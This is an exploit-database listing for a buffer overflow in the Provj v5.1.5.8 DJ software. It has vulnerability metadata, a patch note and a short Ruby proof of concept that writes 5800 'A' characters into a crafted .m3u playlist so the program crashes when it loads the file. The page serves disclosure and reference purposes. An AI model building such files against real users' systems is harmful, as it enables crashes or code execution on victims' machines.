header-logo
Suggest Exploit
vendor:
Provj
by:
Necmettin COSKUN
7,8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Provj
Affected Version From: v5.1.5.8
Affected Version To: v5.1.5.8
Patch Exists: Yes
Related CWE: N/A
CPE: a:clubdjpro:provj:5.1.5.8
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
2020

Provj v5.1.5.8 Buffer Overflow (Poc)

Provj v5.1.5.8 is vulnerable to a buffer overflow vulnerability when a specially crafted .m3u file is loaded. An attacker can exploit this vulnerability by creating a malicious .m3u file and sending it to the victim. When the victim opens the file, the attacker can execute arbitrary code on the victim's system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the software.
Source

Exploit-DB raw data:

#!/usr/bin/env ruby
# coding:UTF-8
# Exploit Title:Provj v5.1.5.8 Buffer Overflow (Poc)
# Author:Necmettin COSKUN => twitter.com/babayarisi
# Vendor :http://www.clubdjpro.com
# Software link:http://www.clubdjpro.com/files/provj5.exe
# version: v5.1.5.8
# Tested on: windows XP sp2

puts "1.Start Program With Trial Mode"
puts "2.Load Playlist .m3u"
puts "3.Don't be evil"

KESST = "A" * 5800

File.open('poj.m3u', 'w') do |bofdosya|  
bofdosya.puts (KESST)
bofdosya.close()
end

Navigation

Suggest Exploit

Services By CQR